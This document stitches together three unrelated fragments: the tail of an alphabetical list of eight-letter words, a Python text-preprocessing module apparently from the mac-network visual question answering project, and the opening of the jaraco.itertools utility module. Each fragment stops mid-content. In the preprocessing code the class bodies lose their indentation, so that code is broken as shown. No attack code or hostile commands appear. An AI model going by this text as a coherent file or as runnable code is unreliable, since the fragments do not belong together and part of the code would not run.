"fiancees",
"fiascoes",
"fiberize",
"fibranne",
"fibrilla",
"fibroins",
"fibromas",
"fibroses",
"fibrotic",
"fibsters",
"ficklest",
"fideisms",
"fideists",
"fidgeted",
"fidgeter",
"fiefdoms",
"fielders",
"fieriest",
"fifteens",
"fiftyish",
"figeater",
"figments",
"figuline",
"figurant",
"figurate",
"figurers",
"figworts",
"filagree",
"filarees",
"filariae",
"filarial",
"filarian",
"filariid",
"filature",
"filberts",
"filchers",
"filching",
"fileable",
"filefish",
"fileting",
"filially",
"filiated",
"filiates",
"filibegs",
"filicide",
"filiform",
"filister",
"filleted",
"filliped",
"filmable",
"filmcard",
"filmdoms",
"filmgoer",
"filmiest",
"filmland",
"filmless",
"filmlike",
"filmsets",
"filterer",
"filthier",
"filthily",
"fimbriae",
"fimbrial",
"finagled",
"finagler",
"finagles",
"finalism",
"finbacks",
"findable",
"fineable",
"fineries",
"finespun",
"finessed",
"finesses",
"finfoots",
"fingerer",
"finialed",
"finickin",
"finiking",
"finitude",
"finmarks",
"finnicky",
"finniest",
"finnmark",
"finochio",
"fireable",
"fireback",
"firebase",
"fireboat",
"firebomb",
"firebrat",
"firebugs",
"fireclay",
"firedamp",
"firedogs",
"firefang",
"firehall",
"fireless",
"firelock",
"firepans",
"firepink",
"fireplug",
"firepots",
"fireroom",
"fireship",
"firetrap",
"fireweed",
"fireworm",
"firriest",
"fishable",
"fishbolt",
"fisheyes",
"fishgigs",
"fishhook",
"fishiest",
"fishings",
"fishless",
"fishlike",
"fishline",
"fishmeal",
"fishpole",
"fishtail",
"fishways",
"fishwife",
"fishworm",
"fissions",
"fissiped",
"fissural",
"fissured",
"fistfuls",
"fistnote",
"fistulae",
"fistular",
"fistulas",
"fitchets",
"fitchews",
"fitfully",
"fitments",
"fittable",
"fivefold",
"fivepins",
"fixatifs",
"fixating",
"fixities",
"fizziest",
"fizzling",
"flabbier",
"flabbily",
"flabella",
"flackery",
"flacking",
"flaggers",
"flaggier",
"flagless",
"flakiest",
"flambeed",
"flameout",
"flamiest",
"flamines",
"flamming",
"flancard",
"flanerie",
"flaneurs",
"flangers",
"flanging",
"flankers",
"flannels",
"flaperon",
"flapjack",
"flapless",
"flappers",
"flappier",
"flareups",
"flashgun",
"flashier",
"flashily",
"flaskets",
"flatbeds",
"flatboat",
"flatcaps",
"flatcars",
"flatfeet",
"flatfish",
"flatfoot",
"flatlets",
"flatling",
"flatlong",
"flattens",
"flatters",
"flattest",
"flatting",
"flattish",
"flattops",
"flatuses",
"flatwash",
"flatways",
"flatwise",
"flatwork",
"flatworm",
"flaunted",
"flaunter",
"flautist",
"flavanol",
"flavines",
"flavones",
"flavonol",
"flavorer",
"flavoury",
"flawiest",
"flaxiest",
"fleabags",
"fleabane",
"fleabite",
"fleapits",
"fleawort",
"flecking",
"flection",
"fledgier",
"fledging",
"fleecers",
"fleeched",
"fleeches",
"fleecier",
"fleecily",
"fleecing",
"fleering",
"fleetest",
"flehmens",
"fleishig",
"flenched",
"flenches",
"flensers",
"flensing",
"fleshers",
"fleshier",
"fleshily",
"fleshing",
"fleshpot",
"fletched",
"fletches",
"fleurons",
"flexagon",
"flexions",
"flextime",
"flexuose",
"flexuous",
"flexures",
"flichter",
"flickery",
"flighted",
"flimflam",
"flimsier",
"flimsies",
"flimsily",
"flinched",
"flincher",
"flinches",
"flingers",
"flinkite",
"flintier",
"flintily",
"flinting",
"flipflop",
"flippest",
"flirters",
"flirtier",
"flitched",
"flitches",
"flitters",
"flitting",
"flivvers",
"floatage",
"floatels",
"floatier",
"floccing",
"floccose",
"floccule",
"flocculi",
"flockier",
"floggers",
"flokatis",
"flooders",
"floorage",
"floorers",
"floosies",
"floozies",
"flopover",
"floppers",
"floppier",
"floppily",
"florally",
"floridly",
"florigen",
"floruits",
"flossers",
"flossier",
"flossies",
"flossily",
"flotages",
"flotsams",
"flounced",
"flounces",
"flouring",
"flouters",
"flouting",
"flowages",
"flowerer",
"floweret",
"flubbers",
"flubbing",
"flubdubs",
"fluerics",
"fluffers",
"fluffier",
"fluffily",
"fluffing",
"fluidics",
"fluidise",
"fluidize",
"fluidram",
"flukiest",
"flummery",
"flumping",
"flunkers",
"flunkeys",
"flunkies",
"flunking",
"fluorene",
"fluorids",
"fluorins",
"flurried",
"flushers",
"flushest",
"flusters",
"flutiest",
"flutings",
"flutists",
"flutters",
"fluttery",
"fluxgate",
"fluxions",
"flyaways",
"flybelts",
"flyblown",
"flyblows",
"flyboats",
"flyovers",
"flypaper",
"flypasts",
"flysches",
"flysheet",
"flyspeck",
"flytiers",
"flytings",
"flytraps",
"foamable",
"foamiest",
"foamless",
"foamlike",
"focalise",
"focalize",
"focusers",
"foddered",
"foetuses",
"fogbound",
"fogeyish",
"fogeyism",
"fogfruit",
"foggages",
"foggiest",
"foghorns",
"fogyisms",
"foilable",
"foilsman",
"foilsmen",
"foisting",
"folacins",
"foldaway",
"foldboat",
"folderol",
"foldouts",
"foliaged",
"foliages",
"foliated",
"foliates",
"folioing",
"folkiest",
"folklike",
"folkmoot",
"folkmote",
"folkmots",
"folksier",
"folksily",
"folksong",
"fomented",
"fomenter",
"fondants",
"fondlers",
"fonduing",
"fontanel",
"fontinas",
"foodless",
"foodways",
"foofaraw",
"foolfish",
"foolscap",
"footages",
"footbags",
"footbath",
"footboys",
"footfall",
"footgear",
"footiest",
"footlers",
"footless",
"footlike",
"footling",
"footmark",
"footpace",
"footpads",
"footrace",
"footrope",
"footsies",
"footslog",
"footsore",
"footstep",
"footwall",
"footways",
"footworn",
"foozlers",
"foozling",
"foragers",
"foramens",
"foramina",
"forayers",
"foraying",
"forbears",
"forbidal",
"forboded",
"forbodes",
"forborne",
"forcedly",
"forcipes",
"fordable",
"fordless",
"fordoing",
"forebays",
"forebear",
"forebode",
"forebody",
"foreboom",
"foredate",
"foredeck",
"foredoes",
"foredone",
"foredoom",
"foreface",
"forefeel",
"forefeet",
"forefelt",
"forefend",
"foregoer",
"foregoes",
"foreguts",
"forehoof",
"foreknew",
"foreknow",
"forelady",
"foreland",
"forelegs",
"forelimb",
"forelock",
"foremast",
"foremilk",
"forenoon",
"forepart",
"forepast",
"forepaws",
"forepeak",
"forerank",
"foreruns",
"foresaid",
"foresail",
"foreseer",
"foreshow",
"foreside",
"forestal",
"forestay",
"foretime",
"foretops",
"forevers",
"forewarn",
"forewent",
"forewing",
"foreworn",
"foreyard",
"forfends",
"forgiver",
"forgoers",
"forgoing",
"forjudge",
"forkball",
"forkedly",
"forkfuls",
"forkiest",
"forkless",
"forklike",
"forksful",
"formable",
"formably",
"formants",
"formates",
"formicas",
"fornical",
"fornices",
"forrader",
"forsaker",
"forsakes",
"forspent",
"forswear",
"forswore",
"forsworn",
"fortuity",
"fortuned",
"fortyish",
"forzandi",
"forzando",
"fossette",
"fossicks",
"fosterer",
"fouettes",
"foughten",
"foulards",
"foulings",
"foulness",
"fourchee",
"foureyed",
"fourgons",
"fourplex",
"foveated",
"foveolae",
"foveolar",
"foveolas",
"foveoles",
"foveolet",
"fowlings",
"foxfires",
"foxhunts",
"foxiness",
"foxskins",
"foxtails",
"foxtrots",
"foziness",
"frabjous",
"fracases",
"fracturs",
"fraenums",
"fragging",
"frailest",
"frakturs",
"framable",
"framings",
"francium",
"francize",
"frankers",
"frankest",
"frapping",
"fraughts",
"fraulein",
"frayings",
"frazzles",
"freakier",
"freakily",
"freakout",
"freebase",
"freebees",
"freeboot",
"freeload",
"freeness",
"freesias",
"freights",
"fremitus",
"frenched",
"frenches",
"frenular",
"frenulum",
"frenzies",
"frenzily",
"frescoed",
"frescoer",
"freshens",
"freshets",
"freshing",
"fresnels",
"fretsaws",
"fretsome",
"fretters",
"frettier",
"fretwork",
"friaries",
"fribbled",
"fribbler",
"fribbles",
"fricando",
"friended",
"frigging",
"frighted",
"frigidly",
"frijoles",
"frillers",
"frillier",
"frilling",
"fringier",
"frippery",
"frisette",
"friseurs",
"friskers",
"friskets",
"friskier",
"friskily",
"frisking",
"frissons",
"frittata",
"fritting",
"frivoled",
"frivoler",
"frizette",
"frizzers",
"frizzier",
"frizzies",
"frizzily",
"frizzing",
"frizzled",
"frizzler",
"frizzles",
"frocking",
"frogeyed",
"frogeyes",
"frogfish",
"froggier",
"frogging",
"froglets",
"froglike",
"frolicky",
"fromages",
"fromenty",
"frondeur",
"frondose",
"frontals",
"frontlet",
"frontmen",
"frontons",
"frostbit",
"frosteds",
"frostier",
"frostily",
"frostnip",
"frothers",
"frothier",
"frothily",
"frottage",
"frotteur",
"froufrou",
"frounced",
"frounces",
"frouzier",
"frowners",
"frowsier",
"frowsted",
"frowzier",
"frowzily",
"frozenly",
"fructify",
"frugally",
"frugging",
"fruitage",
"fruiters",
"fruitier",
"fruitily",
"fruitlet",
"frumenty",
"frumpier",
"frumpily",
"frumpish",
"frustule",
"frustums",
"frybread",
"fubsiest",
"fuchsias",
"fuchsine",
"fuchsins",
"fuckoffs",
"fucoidal",
"fuddling",
"fuehrers",
"fuellers",
"fugacity",
"fuggiest",
"fugleman",
"fuglemen",
"fuguists",
"fulcrums",
"fullered",
"fullface",
"fulmined",
"fulmines",
"fulminic",
"fumarase",
"fumarole",
"fumatory",
"fumblers",
"fumeless",
"fumelike",
"fumettes",
"fumigant",
"fumigate",
"fumingly",
"fumitory",
"funereal",
"funfairs",
"funfests",
"fungible",
"fungoids",
"funguses",
"funicles",
"funiculi",
"funkiest",
"funnyman",
"funnymen",
"furanose",
"furbelow",
"furcated",
"furcates",
"furcraea",
"furculae",
"furcular",
"furculum",
"furfural",
"furfuran",
"furfures",
"furibund",
"furlable",
"furmenty",
"furnaced",
"furriers",
"furriery",
"furriest",
"furriner",
"furrings",
"furrower",
"furuncle",
"furziest",
"fuseless",
"fuselike",
"fusiform",
"fusileer",
"fusilier",
"fusillis",
"fusional",
"fussiest",
"fusspots",
"fustians",
"fustiest",
"futharcs",
"futharks",
"futhorcs",
"futhorks",
"futilely",
"futtocks",
"fuzziest",
"fuzztone",
"gabbards",
"gabbarts",
"gabbiest",
"gabblers",
"gabbling",
"gabbroic",
"gabbroid",
"gabelled",
"gabelles",
"gabfests",
"gadabout",
"gadarene",
"gadflies",
"gadroons",
"gadwalls",
"gadzooks",
"gaggling",
"gagsters",
"gahnites",
"gaieties",
"gainable",
"gainless",
"gainlier",
"gainsaid",
"gainsays",
"galabias",
"galabieh",
"galabiya",
"galangal",
"galangas",
"galateas",
"galavant",
"galbanum",
"galeated",
"galenite",
"galettes",
"galilees",
"galipots",
"galivant",
"gallants",
"gallates",
"galleass",
"galleins",
"galleons",
"galletas",
"galleted",
"galliard",
"galliass",
"gallican",
"gallicas",
"galliots",
"gallipot",
"galliums",
"gallnuts",
"galloons",
"galloots",
"galloped",
"galloper",
"gallused",
"galluses",
"gallying",
"galopade",
"galoping",
"galoshed",
"galoshes",
"galumphs",
"gamashes",
"gambades",
"gambados",
"gambeson",
"gambiers",
"gamboges",
"gamboled",
"gambrels",
"gambusia",
"gamelans",
"gamelike",
"gameness",
"gamesman",
"gamesmen",
"gamesome",
"gamester",
"gaminess",
"gammadia",
"gammiest",
"gammoned",
"gammoner",
"gamodeme",
"ganaches",
"gandered",
"ganglial",
"gangliar",
"ganglier",
"gangling",
"gangplow",
"gangrels",
"gangstas",
"gangways",
"ganister",
"gantlets",
"gantline",
"gantlope",
"gantries",
"gapeseed",
"gapeworm",
"gapingly",
"gappiest",
"garaging",
"garbages",
"garbagey",
"garbanzo",
"garblers",
"garbless",
"garbling",
"garboard",
"garboils",
"gardened",
"gardyloo",
"garganey",
"garglers",
"gargling",
"garigues",
"garishly",
"garlicky",
"garoting",
"garotted",
"garotter",
"garottes",
"garpikes",
"garreted",
"garroted",
"garroter",
"garrotes",
"garrotte",
"gartered",
"gasalier",
"gaselier",
"gashouse",
"gasified",
"gasifier",
"gasifies",
"gasiform",
"gaskings",
"gasogene",
"gasohols",
"gasolene",
"gasolier",
"gassiest",
"gassings",
"gastight",
"gastness",
"gastraea",
"gastreas",
"gastrins",
"gastrula",
"gasworks",
"gateless",
"gatelike",
"gatepost",
"gauchely",
"gauchest",
"gaudiest",
"gauffers",
"gauntest",
"gauziest",
"gaveling",
"gavelled",
"gavelock",
"gavotted",
"gavottes",
"gawkiest",
"gayeties",
"gaywings",
"gazaboes",
"gazanias",
"gazeboes",
"gazelles",
"gazettes",
"gazogene",
"gazumped",
"gazumper",
"gearcase",
"gearings",
"gearless",
"geekdoms",
"geekiest",
"geepound",
"gelating",
"gelatins",
"gelation",
"geldings",
"gelidity",
"gellants",
"gelsemia",
"gematria",
"geminate",
"gemmated",
"gemmates",
"gemmiest",
"gemmules",
"gemology",
"gemsboks",
"gemsbuck",
"genettes",
"genially",
"genipaps",
"genitors",
"geniture",
"gennaker",
"genogram",
"genoises",
"gensengs",
"gentians",
"gentlest",
"gentling",
"gentrice",
"gentries",
"gentrify",
"geoducks",
"geognosy",
"geologer",
"geomancy",
"geometer",
"geophagy",
"geophone",
"geophyte",
"geoponic",
"geoprobe",
"georgics",
"geotaxes",
"geotaxis",
"geranial",
"geraniol",
"gerardia",
"gerbille",
"gerenuks",
"germfree",
"germiest",
"germlike",
"gerontic",
"gesneria",
"gestalts",
"gestapos",
"gestated",
"gestates",
"gestical",
"gestural",
"gesturer",
"gettable",
"gettered",
"gewgawed",
"gharials",
"gharries",
"ghastful",
"gheraoed",
"gheraoes",
"gherkins",
"ghettoed",
"ghettoes",
"ghillies",
"ghostier",
"ghoulies",
"giantism",
"giardias",
"gibbered",
"gibbeted",
"gibbsite",
"gibingly",
"giddiest",
"giddying",
"giftable",
"giftedly",
"giftless",
"gigabits",
"gigaflop",
"gigatons",
"gigawatt",
"gigglers",
"gigglier",
"gilberts",
"gildhall",
"gildings",
"gillnets",
"gillying",
"gilthead",
"gimbaled",
"gimcrack",
"gimleted",
"gimmicky",
"gimpiest",
"gingalls",
"gingeley",
"gingelis",
"gingelli",
"gingelly",
"gingered",
"ginghams",
"gingilis",
"gingilli",
"gingivae",
"gingkoes",
"ginkgoes",
"ginniest",
"ginnings",
"ginsengs",
"gipsying",
| |
# Source repository: alexmirrington/mac-network
import json
import math
import os
import pickle
import random
import re
import time
import numpy as np
from nltk.tokenize import word_tokenize
from nltk.tokenize.stanford import StanfordTokenizer
from termcolor import colored
from tqdm import tqdm
from config import config
from program_translator import ProgramTranslator
# Terminal formatting helper: bold text.
def bold(txt):
    """Return *txt* rendered as a bold string for terminal output."""
    text = str(txt)
    return colored(text, attrs=["bold"])
# Terminal formatting helper: bold text in a given color.
def bcolored(txt, color):
    """Return *txt* rendered bold in *color* for terminal output."""
    text = str(txt)
    return colored(text, color, attrs=["bold"])
# Write a single value to an open file, followed by a newline.
def writeline(f, line):
    """Write str(line) plus a trailing newline to file object *f*."""
    rendered = str(line)
    f.write(rendered + "\n")
# Write a list to an open file as one comma-separated line.
def writelist(f, lst):
    """Write the elements of *lst* to *f*, comma-joined, plus a newline."""
    joined = ",".join(str(item) for item in lst)
    writeline(f, joined)
# 2d list to numpy
def vectorize2DList(items, minX=0, minY=0, dtype=int):
    """Pad a ragged 2D Python list into a dense, zero-padded numpy array.

    Args:
        items: list of lists; inner lists may have different lengths.
        minX: minimum number of rows in the output array.
        minY: minimum number of columns in the output array.
        dtype: numpy dtype of the output array.

    Returns:
        (t, tLengths): t is a (maxX, maxY) zero-padded array; tLengths[i]
        holds the original length of row i.
    """
    # BUG FIX: the old default ``dtype=np.int`` raises AttributeError on
    # NumPy >= 1.24 (the alias was removed). The builtin ``int`` is exactly
    # what ``np.int`` used to alias, so behavior is unchanged.
    maxX = max(len(items), minX)
    maxY = max([len(item) for item in items] + [minY])
    t = np.zeros((maxX, maxY), dtype=dtype)
    tLengths = np.zeros((maxX,), dtype=int)
    for i, item in enumerate(items):
        t[i, 0 : len(item)] = np.array(item, dtype=dtype)
        tLengths[i] = len(item)
    return t, tLengths
# 3d list to numpy
def vectorize3DList(items, minX=0, minY=0, minZ=0, dtype=int):
    """Pad a ragged 3D Python list into a dense, zero-padded numpy array.

    Args:
        items: list of lists of lists; inner lists may vary in length.
        minX, minY, minZ: minimum size of each output dimension.
        dtype: numpy dtype of the output array.

    Returns:
        (t, tLengths): t is a (maxX, maxY, maxZ) zero-padded array;
        tLengths[i, j] holds the original length of items[i][j].
    """
    # BUG FIX: the old default ``dtype=np.int`` raises AttributeError on
    # NumPy >= 1.24 (the alias was removed); ``int`` is the exact former alias.
    maxX = max(len(items), minX)
    maxY = max([len(item) for item in items] + [minY])
    maxZ = max([len(subitem) for item in items for subitem in item] + [minZ])
    t = np.zeros((maxX, maxY, maxZ), dtype=dtype)
    tLengths = np.zeros((maxX, maxY), dtype=int)
    for i, item in enumerate(items):
        for j, subitem in enumerate(item):
            t[i, j, 0 : len(subitem)] = np.array(subitem, dtype=dtype)
            tLengths[i, j] = len(subitem)
    return t, tLengths
"""
Encodes text into integers. Keeps dictionary between string words (symbols)
and their matching integers. Supports encoding and decoding.
"""
class SymbolDict(object):
def __init__(self, empty=False):
self.padding = "<PAD>"
self.unknown = "<UNK>"
self.start = "<START>"
self.end = "<END>"
self.invalidSymbols = [self.padding, self.unknown, self.start, self.end]
if empty:
self.sym2id = {self.padding: 0}
self.id2sym = [self.padding]
else:
self.sym2id = {self.padding: 0, self.unknown: 1, self.start: 2, self.end: 3}
self.id2sym = [self.padding, self.unknown, self.start, self.end]
self.allSeqs = []
def getNumSymbols(self):
return len(self.sym2id)
def isValid(self, enc):
return enc not in self.invalidSymbols
def resetSeqs(self):
self.allSeqs = []
def addSymbols(self, seq):
if type(seq) is not list:
seq = [seq]
self.allSeqs += seq
# Call to create the words-to-integers vocabulary after
# (reading word sequences with addSymbols).
def addToVocab(self, symbol):
if symbol not in self.sym2id:
self.sym2id[symbol] = self.getNumSymbols()
self.id2sym.append(symbol)
# create vocab only if not existing..?
def createVocab(self, minCount=0, top=0, addUnk=False, weights=False):
counter = {}
for symbol in self.allSeqs:
counter[symbol] = counter.get(symbol, 0) + 1
isTop = lambda symbol: True
if top > 0:
topItems = sorted(counter.items(), key=lambda x: x[1], reverse=True)[:top]
tops = [k for k, v in topItems]
isTop = lambda symbol: symbol in tops
if addUnk:
self.addToVocab(self.unknown)
for symbol in counter:
if counter[symbol] > minCount and isTop(symbol):
self.addToVocab(symbol)
self.counter = counter
self.counts = np.array([counter.get(sym, 0) for sym in self.id2sym])
if weights:
self.weights = np.array([1.0 for sym in self.id2sym])
if config.ansWeighting:
weight = lambda w: 1.0 / float(w) if w > 0 else 0.0
self.weights = np.array(
[weight(counter.get(sym, 0)) for sym in self.id2sym]
)
totalWeight = np.sum(self.weights)
self.weights /= totalWeight
self.weights *= len(self.id2sym)
elif config.ansWeightingRoot:
weight = lambda w: 1.0 / math.sqrt(float(w)) if w > 0 else 0
self.weights = np.array(
[weight(counter.get(sym, 0)) for sym in self.id2sym]
)
totalWeight = np.sum(self.weights)
self.weights /= totalWeight
self.weights *= len(self.id2sym)
# Encodes a symbol. Returns the matching integer.
def encodeSym(self, symbol):
if symbol not in self.sym2id:
symbol = self.unknown
return self.sym2id[
symbol
] # self.sym2id.get(symbol, None) # # -1 VQA MAKE SURE IT DOESNT CAUSE BUGS
"""
Encodes a sequence of symbols.
Optionally add start, or end symbols.
Optionally reverse sequence
"""
def encodeSeq(self, decoded, addStart=False, addEnd=False, reverse=False):
if reverse:
decoded.reverse()
if addStart:
decoded = [self.start] + decoded
if addEnd:
decoded = decoded + [self.end]
encoded = [self.encodeSym(symbol) for symbol in decoded]
return encoded
# Decodes an integer into its symbol
def decodeId(self, enc):
return self.id2sym[enc] if enc < self.getNumSymbols() else self.unknown
"""
Decodes a sequence of integers into their symbols.
If delim is given, joins the symbols using delim,
Optionally reverse the resulted sequence
"""
def decodeSeq(self, encoded, delim=None, reverse=False, stopAtInvalid=True):
length = 0
for i in range(len(encoded)):
if not self.isValid(self.decodeId(encoded[i])) and stopAtInvalid:
# if not self.isValid(encoded[i]) and stopAtInvalid:
break
length += 1
encoded = encoded[:length]
decoded = [self.decodeId(enc) for enc in encoded]
if reverse:
decoded.reverse()
if delim is not None:
return delim.join(decoded)
return decoded
"""
Preprocesses a given dataset into numpy arrays.
By calling preprocess, the class:
1. Reads the input data files into dictionary.
2. Saves the results jsons in files and loads them instead of parsing input if
files exist
3. Initializes word embeddings to random / GloVe.
4. Optionally filters data according to given filters.
5. Encodes and vectorize the data into numpy arrays.
6. Buckets the data according to the instances length.
"""
class Preprocesser(object):
    def __init__(self):
        # Vocabulary over question tokens (includes <UNK>/<START>/<END>).
        self.questionDict = SymbolDict()
        # Answer vocabulary starts "empty" (padding only) so answer ids stay compact.
        self.answerDict = SymbolDict(empty=True)
        # Joint question+answer vocabulary.
        self.qaDict = SymbolDict()
        # Populate the dicts from previously saved vocab files.
        # NOTE(review): loadVocabs is defined outside this chunk — confirm it
        # tolerates missing vocab files on a fresh run.
        self.loadVocabs()
        self.specificDatasetDicts = None
        # Vocabulary and translator for functional programs (second arg is
        # passed through to ProgramTranslator; its meaning is defined there).
        self.programDict = SymbolDict()
        self.programTranslator = ProgramTranslator(self.programDict, 2)
"""
Tokenizes string into list of symbols.
Args:
text: raw string to tokenize.
ignorePuncts: punctuation to ignore
keptPunct: punctuation to keep (as symbol)
endPunct: punctuation to remove if appears at the end
delim: delimiter between symbols
clean: True to replace text in string
replacelistPre: dictionary of replacement to perform on the text before
tokenization
replacelistPost: dictionary of replacement to perform on the text after
tokenization
"""
# sentence tokenizer
allPunct = ["?", "!", "\\", "/", ")", "(", ".", ",", ";", ":"]
fullPunct = [
";",
r"/",
"[",
"]",
'"',
"{",
"}",
"(",
")",
"=",
"+",
"\\",
"_",
"-",
">",
"<",
"@",
"`",
",",
"?",
"!",
"%",
"^",
"&",
"*",
"~",
"#",
"$",
]
contractions = {
"aint": "ain't",
"arent": "aren't",
"cant": "can't",
"couldve": "could've",
"couldnt": "couldn't",
"couldn'tve": "couldn't've",
"couldnt've": "couldn't've",
"didnt": "didn't",
"doesnt": "doesn't",
"dont": "don't",
"hadnt": "hadn't",
"hadnt've": "hadn't've",
"hadn'tve": "hadn't've",
"hasnt": "hasn't",
"havent": "haven't",
"hed": "he'd",
"hed've": "he'd've",
"he'dve": "he'd've",
"hes": "he's",
"howd": "how'd",
"howll": "how'll",
"hows": "how's",
"Id've": "I'd've",
"I'dve": "I'd've",
"Im": "I'm",
"Ive": "I've",
"isnt": "isn't",
"itd": "it'd",
"itd've": "it'd've",
"it'dve": "it'd've",
"itll": "it'll",
"let's": "let's",
"maam": "ma'am",
"mightnt": "mightn't",
"mightnt've": "mightn't've",
"mightn'tve": "mightn't've",
"mightve": "might've",
"mustnt": "mustn't",
"mustve": "must've",
"neednt": "needn't",
"notve": "not've",
"oclock": "o'clock",
"oughtnt": "oughtn't",
"ow's'at": "'ow's'at",
"'ows'at": "'ow's'at",
"'ow'sat": "'ow's'at",
"shant": "shan't",
"shed've": "she'd've",
"she'dve": "she'd've",
"she's": "she's",
"shouldve": "should've",
"shouldnt": "shouldn't",
"shouldnt've": "shouldn't've",
"shouldn'tve": "shouldn't've",
"somebody'd": "somebodyd",
"somebodyd've": "somebody'd've",
"somebody'dve": "somebody'd've",
"somebodyll": "somebody'll",
"somebodys": "somebody's",
"someoned": "someone'd",
"someoned've": "someone'd've",
"someone'dve": "someone'd've",
"someonell": "someone'll",
"someones": "someone's",
"somethingd": "something'd",
"somethingd've": "something'd've",
"something'dve": "something'd've",
"somethingll": "something'll",
"thats": "that's",
"thered": "there'd",
"thered've": "there'd've",
"there'dve": "there'd've",
"therere": "there're",
"theres": "there's",
"theyd": "they'd",
"theyd've": "they'd've",
"they'dve": "they'd've",
"theyll": "they'll",
"theyre": "they're",
"theyve": "they've",
"twas": "'twas",
"wasnt": "wasn't",
"wed've": "we'd've",
"we'dve": "we'd've",
"weve": "we've",
"werent": "weren't",
"whatll": "what'll",
"whatre": "what're",
"whats": "what's",
"whatve": "what've",
"whens": "when's",
"whered": "where'd",
"wheres": "where's",
"whereve": "where've",
"whod": "who'd",
"whod've": "who'd've",
"who'dve": "who'd've",
"wholl": "who'll",
"whos": "who's",
"whove": "who've",
"whyll": "why'll",
"whyre": "why're",
"whys": "why's",
"wont": "won't",
"wouldve": "would've",
"wouldnt": "wouldn't",
"wouldnt've": "wouldn't've",
"wouldn'tve": "wouldn't've",
"yall": "y'all",
"yall'll": "y'all'll",
"y'allll": "y'all'll",
"yall'd've": "y'all'd've",
"y'alld've": "y'all'd've",
"y'all'dve": "y'all'd've",
"youd": "you'd",
"youd've": "you'd've",
"you'dve": "you'd've",
"youll": "you'll",
"youre": "you're",
"youve": "you've",
}
    # Spelled-out numbers normalized to digits during cleaning.
    nums = {
        "none": "0",
        "zero": "0",
        "one": "1",
        "two": "2",
        "three": "3",
        "four": "4",
        "five": "5",
        "six": "6",
        "seven": "7",
        "eight": "8",
        "nine": "9",
        "ten": "10",
    }
    # Articles are dropped entirely (questions only; see allReplaceQ).
    articles = {"a": "", "an": "", "the": ""}
    # Question replacements: contractions + numbers + article removal.
    allReplaceQ = {}
    for replace in [contractions, nums, articles]:
        allReplaceQ.update(replace)
    # Answer replacements: contractions + numbers (articles are kept).
    allReplaceA = {}
    for replace in [contractions, nums]:
        allReplaceA.update(replace)
    # NOTE(review): "(?!<=\d)" is a negative lookahead for the literal
    # string "<=digit" (almost always true), presumably intended as the
    # lookbehind "(?<!\d)". The same typo exists in the official VQA
    # preprocessing code, so it is kept as-is for compatibility — confirm.
    periodStrip = lambda self, s: re.sub(r"(?!<=\d)(\.)(?!\d)", " ", s)
    collonStrip = lambda self, s: re.sub(
        r"(?!<=\d)(:)(?!\d)", " ", s
    )  # replace with " " or ""?
    # Remove thousands separators inside numbers, e.g. "1,000" -> "1000".
    commaNumStrip = lambda self, s: re.sub(r"(\d)(\,)(\d)", r"\1\3", s)
    # VQA-style wrapper around processText: delimiter-split on fullPunct and
    # apply the question/answer replacement tables after tokenization.
    # (Class-level lambdas with an explicit `self` behave like methods when
    # accessed through an instance.)
    vqaProcessText = lambda self, text, tokenize, question: self.processText(
        text,
        ignoredPunct=[],
        keptPunct=[],
        endPunct=[],
        delimPunct=self.fullPunct,
        replacelistPost=self.allReplaceQ if question else self.allReplaceA,
        reClean=True,
        tokenize=tokenize,
    )
def processText(
self,
text,
ignoredPunct=["?", "!", "\\", "/", ")", "("],
keptPunct=[".", ",", ";", ":"],
endPunct=[">", "<", ":"],
delimPunct=[],
delim=" ",
clean=False,
replacelistPre=dict(),
replacelistPost=dict(),
reClean=False,
tokenize=True,
):
if reClean:
text = self.periodStrip(text)
text = self.collonStrip(text)
text = self.commaNumStrip(text)
if clean:
for word in replacelistPre:
origText = text
text = text.replace(word, replacelistPre[word])
if origText != text:
print(origText)
print(text)
print("")
for punct in endPunct:
if text[-1] == punct:
print(text)
text = text[:-1]
print(text)
| |
"""
jaraco.itertools
Tools for working with iterables. Complements itertools and more_itertools.
"""
import operator
import itertools
import collections
import math
import warnings
import functools
import heapq
import collections.abc
import queue
import inflect
import more_itertools
def make_rows(num_columns, seq):
    """
    Make a sequence into rows of num_columns columns.
    >>> tuple(make_rows(2, [1, 2, 3, 4, 5]))
    ((1, 4), (2, 5), (3, None))
    >>> tuple(make_rows(3, [1, 2, 3, 4, 5]))
    ((1, 3, 5), (2, 4, None))
    """
    # calculate the minimum number of rows necessary to fit the list in
    # num_columns columns
    num_rows, partial = divmod(len(seq), num_columns)
    if partial:
        num_rows += 1
    # Break the seq into num_columns groups of length num_rows, padding the
    # last group with None. This is what more_itertools.grouper did here,
    # but itertools.zip_longest does it unconditionally — removing the
    # try/except that worked around the grouper() signature change between
    # more_itertools 5.x and 6.x.
    columns = itertools.zip_longest(*[iter(seq)] * num_rows)
    # columns is a list of columns... transpose it to return a list of rows.
    return zip(*columns)
def bisect(seq, func=bool):
    """
    Partition a sequence into two sequences: first the elements for which
    func(element) is false, then those for which it is true.
    By default, func is ``bool``, so uses the truth value of the object.
    >>> is_odd = lambda n: n%2
    >>> even, odd = bisect(range(5), is_odd)
    >>> list(odd)
    [1, 3]
    >>> list(even)
    [0, 2, 4]
    >>> other, zeros = bisect(reversed(range(5)))
    >>> list(zeros)
    [0]
    >>> list(other)
    [4, 3, 2, 1]
    """
    return GroupbySaved(seq, func).get_first_n_queues(2)
class GroupbySaved:
    """
    Split a sequence into n sequences where n is determined by the
    number of distinct values returned by a key function applied to each
    element in the sequence.
    >>> truthsplit = GroupbySaved(['Test', '', 30, None], bool)
    >>> truthsplit['x']
    Traceback (most recent call last):
    ...
    KeyError: 'x'
    >>> true_items = truthsplit[True]
    >>> false_items = truthsplit[False]
    >>> tuple(iter(false_items))
    ('', None)
    >>> tuple(iter(true_items))
    ('Test', 30)
    >>> every_third_split = GroupbySaved(range(99), lambda n: n%3)
    >>> zeros = every_third_split[0]
    >>> ones = every_third_split[1]
    >>> twos = every_third_split[2]
    >>> next(zeros)
    0
    >>> next(zeros)
    3
    >>> next(ones)
    1
    >>> next(twos)
    2
    >>> next(ones)
    4
    """
    def __init__(self, sequence, func=lambda x: x):
        # A single shared iterator: every queue pulls from it via __fetch__,
        # so elements are consumed from the source exactly once, lazily.
        self.sequence = iter(sequence)
        self.func = func
        # key -> FetchingQueue, in first-seen key order.
        self.queues = collections.OrderedDict()
    def __getitem__(self, key):
        # Return the queue for `key`, consuming the source as needed;
        # raises KeyError if the source never yields an element with `key`.
        try:
            return self.queues[key]
        except KeyError:
            return self.__find_queue__(key)
    def __fetch__(self):
        "get the next item from the sequence and queue it up"
        # Propagates StopIteration when the source is exhausted; callers
        # rely on that to stop searching.
        item = next(self.sequence)
        key = self.func(item)
